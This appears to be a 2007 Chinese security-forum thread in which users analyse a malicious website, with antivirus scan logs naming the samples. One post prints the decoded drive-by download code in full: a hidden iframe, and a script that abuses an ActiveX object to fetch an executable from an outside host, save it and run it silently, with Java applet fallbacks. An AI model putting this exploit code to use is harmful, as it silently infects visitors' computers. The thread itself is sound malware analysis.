谁能分析一下这个毒网。

zengmingwh

hxxp://repuc.info/lc0025.html
下的毒都被小红伞杀啦。

moonsilver

晕了，代码被加密，得花点时间

鼻耳盖子

发现这个后就把网页关了
广告软件名称:AdWare.Win32.SpySheriff.i
程序:
C:\WN0025.EXE
是广告软件!
已成功阻止其运行,是否要删除此文件?

lanvin

clamwin挂


Scan Started Thu Apr 26 12:58:44 2007
-------------------------------------------------------------------------------


----------- SCAN SUMMARY -----------
Known viruses: 112475
Engine version: 0.90.1
Scanned directories: 0
Scanned files: 1
Skipped non-executable files: 0
Infected files: 0

Data scanned: 0.00 MB
Time: 33.498 sec (0 m 33 s)
--------------------------------------
Completed
--------------------------------------

icka

也许大概是下面的

1. 
   
2. <HTML style="BEHAVIOR: url('#default#clientCaps')"><HEAD></HEAD>
   
3. <BODY>
   
4. <SCRIPT>var ifr='<iframe width=2 height=2 style=display:none';var t='other';if(document.all){document.all[0].style.behavior='url("#default#clientCaps")';if(document.all[0].connectionType == 'modem'){t='modem';}}document.write(ifr+' src=http://negas.info/?u=0025&t='+t+'></iframe>');</SCRIPT>
   
5. <IFRAME style="DISPLAY: none" src="http://negas.info/?u=0025&amp;t=modem" width=2 height=2></IFRAME></BODY></HTML>
   

复制代码

然后其实链接的页面是下面的

1. <html>
   
2. <head>
   
3. <title>403 Forbidden</title>
   
4. <style>
   
5. * {CURSOR: url("anr/us0025.anr")}
   
6. </style>
   
7. </head>
   
8. <body>
   
9. <script>
   
10. <applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>
    
11. function pass1(ii, uu)
    
12. {
    
13.     var t = 'BD96C556'+'-'+'65A3-11'+'D0-98'+'3A-00C0'+'4FC29E36';
    
14.     var b = null;
    
15.     var a = document.createElement("object");
    
16.     a.setAttribute("classid", "clsid:" + t);
    
17.     if (a) {
    
18.         try {
    
19.             eval('b = a.CreateObject("S"+ "h"+ "e"+"l"+ "l."+"A"+ "p"+"p"+ "li"+ "ca"+ ""+ "ti"+ "on", "")');
    
20.         } catch(e){return -1;}
    
21.         if (b) {
    
22.             var bin = "\"+ii+"0025.e"+ "x"+"e";
    
23.             var xml = new ActiveXObject("Mi"+ "cr"+"os"+ "o"+"ft"+ ".XM"+ "LH"+ "TT"+ "P");
    
24.             xml.open("G"+ "ET", uu, false);
    
25.             xml.send(null);
    
26.             var dat = xml.responseBody;
    
27.             var o = a.CreateObject("ADODB.Stream", "");
    
28.             o.Type = 1;
    
29.             o.Mode = 3;
    
30.             o.Open();
    
31.             o.Write(dat);
    
32.             o.SaveToFile(bin, 2);
    
33.             b.ShellExecute(bin, null, null, null, 0);
    
34.             b.ShellExecute("c"+ "md", " /c del \"+ii+"0025.exe", null, null, 0);
    
35.             return 1;
    
36.         }
    
37.     }
    
38.     return -1;
    
39. }
    
40. function pass2()
    
41. {
    
42.     try {
    
43.         var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
    
44.         var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
    
45.         var unsafe = unsafemeth.invoke(unsafemeth, null);
    
46.         document.maniman.foobar(unsafe);
    
47.         var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
    
48.         var chen = unsafe.allocateInstance(chenref);
    
49.         chen.setURLdl([url]http://negas.info/[/url]);
    
50.         chen.setUname("0025");
    
51.         chen.setCID("modem");
    
52.         return chen.perse(unsafe);
    
53.     } catch (d) {return -1;}
    
54.     return -1;
    
55. }
    
56. function pass3()
    
57. {
    
58.     <APPLET ARCHIVE=dsbr.jar code=MagicApplet.class WIDTH=1 HEIGHT=1 name=dsbr MAYSCRIPT>;
    
59.     <param name=ModulePath value=http://negas.info/?u=0025&t=modem&o=2&s=c29mdC5OMjMuc3NoLzAwMjUuZXhl></APPLET>;
    
60.     <applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>;
    
61.     <param name=usid value=us0025>;
    
62.     <param name=linkurl value=http://negas.info/?u=0025&t=modem&o=4&s=c29mdC5OMjMuc3NoLzAwMjUuZXhl></applet>;
    
63.     return 1;
    
64. }
    
65. if (pass1('wn', [url]http://negas.info/?u=0025&t=modem&o=0&s=c29mdC5OMjMuc3NoLzAwMjUuZXhl[/url]) != 1) {
    
66.     if (pass2() != 1) {
    
67.         pass3();
    
68.     }
    
69. //} else {
    
70. //    pass1('us', [url]http://negas.info/?gf=us0025[/url]);
    
71. }
    
72. 
    
73. </script>
    
74. <h1>Forbidden</h1><p>You don't have permissions.</p><hr>
    
75. </body>
    
76. </html>

复制代码

那个us0025.anr
扫描系统区域...
扫描所选择的目录和文件...
对象: us0025.anr
        路径: C:\病毒样本\0422
        Status: 已发现病毒
        病毒: Trojan-Downloader.Win32.Ani.c (KAV 引擎), Exploit.Win32.MS05-002.Gen (BD 引擎)
扫描完成: 2007-4-26 16:10
    已检查 1 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件



扫描系统区域...
扫描所选择的目录和文件...
对象: wn0025.exe
        路径: C:\病毒样本\0422
        Status: 已发现病毒
        病毒: not-virus:Hoax.Win32.Renos.gk (KAV 引擎)
扫描完成: 2007-4-26 16:35
    已检查 1 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件

[ 本帖最后由 icka 于 2007-4-26 16:36 编辑 ]

icka

补充下
那个exe的真实地址就是
hXXp://negas.info/?u=0025&t=modem&o=2&s=c29mdC5OMjMuc3NoLzAwMjUuZXhl

The EQs

Scan performed at: 2007-4-26 16:54:13
Scanning Log
NOD32 version 2219 (20070425) NT
Command line: C:\Documents and Settings\EQ2\桌面\wn0025.rar C:\Documents and Settings\EQ2\桌面\us0025.rar
Operating memory - is OK

Date: 26.4.2007  Time: 16:54:17
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\wn0025.rar; C:\Documents and Settings\EQ2\桌面\us0025.rar
C:\Documents and Settings\EQ2\桌面\wn0025.rar ?RAR ?wn0025.exe - a variant of Win32/Adware.SpySheriff application
C:\Documents and Settings\EQ2\桌面\us0025.rar ?RAR ?us0025.anr - a variant of Win32/TrojanDownloader.Ani.Gen trojan
Number of scanned files: 4
Number of threats found: 2
Number of files cleaned: 2
Time of completion: 16:54:17 Total scanning time: 0 sec (00:00:00)